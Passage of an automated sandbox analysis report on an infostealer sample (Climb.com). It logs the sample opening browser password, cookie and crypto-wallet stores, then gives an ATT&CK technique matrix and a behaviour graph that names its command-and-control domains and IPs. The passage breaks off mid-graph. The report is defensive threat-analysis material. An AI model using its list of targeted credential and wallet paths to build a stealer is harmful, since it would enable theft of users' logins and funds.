                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Climb.comBinary or memory string: WIN_81
                Source: Climb.comBinary or memory string: WIN_XP
                Source: Alt.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Climb.comBinary or memory string: WIN_XPe
                Source: Climb.comBinary or memory string: WIN_VISTA
                Source: Climb.comBinary or memory string: WIN_7
                Source: Climb.comBinary or memory string: WIN_8
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
                Source: Yara matchFile source: 0000000E.00000002.3470529915.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.3296131318.000000000457B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.3296328079.000000000457B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 5660, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 5660, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00572263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,14_2_00572263
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00571C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,14_2_00571C61
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol41
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager13
                File and Directory Discovery
                SMB/Windows Admin Shares21
                Input Capture
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook21
                Access Token Manipulation
                12
                Software Packing
                NTDS239
                System Information Discovery
                Distributed Component Object Model3
                Clipboard Data
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets1071
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                Masquerading
                Cached Domain Credentials461
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Valid Accounts
                DCSync14
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job461
                Virtualization/Sandbox Evasion
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection
                Network Sniffing1
                Remote System Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581578 Sample: CLaYpUL3zw.exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 41 spuriotis.click 2->41 43 yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 12 other signatures 2->59 9 CLaYpUL3zw.exe 4 2->9         started        signatures3 process4 file5 35 C:\Users\user\AppData\Local\Temp\Set-up.exe, PE32 9->35 dropped 37 C:\Users\user\AppData\...\PasoCattle.exe, PE32 9->37 dropped 39 C:\Users\user\AppData\...\CLaYpUL3zw.exe.log, CSV 9->39 dropped 71 Detected unpacking (changes PE section rights) 9->71 73 Tries to detect sandboxes and other dynamic analysis tools (window names) 9->73 75 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->75 77 5 other signatures 9->77 13 PasoCattle.exe 19 9->13         started        15 Set-up.exe 9->15         started        signatures6 process7 dnsIp8 19 cmd.exe 2 13->19         started        47 home.fortth14ht.top 194.87.58.92, 49762, 49773, 49779 RELCOM-ASRelcomGroup19022019RU Russian Federation 15->47 49 httpbin.org 34.226.108.155, 443, 49719 AMAZON-AESUS United States 15->49 51 Multi AV Scanner detection for dropped file 15->51 signatures9 process10 file11 33 C:\Users\user\AppData\Local\...\Climb.com, PE32 19->33 dropped 61 Drops PE files with a suspicious file extension 19->61 23 Climb.com 19->23         started        27 cmd.exe 2 19->27         started        29 extrac32.exe 13 19->29         started        31 8 other processes 19->31 signatures12 process13 dnsIp14 45 spuriotis.click 172.67.128.184, 443, 49774, 49781 CLOUDFLARENETUS United States 23->45 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->63 65 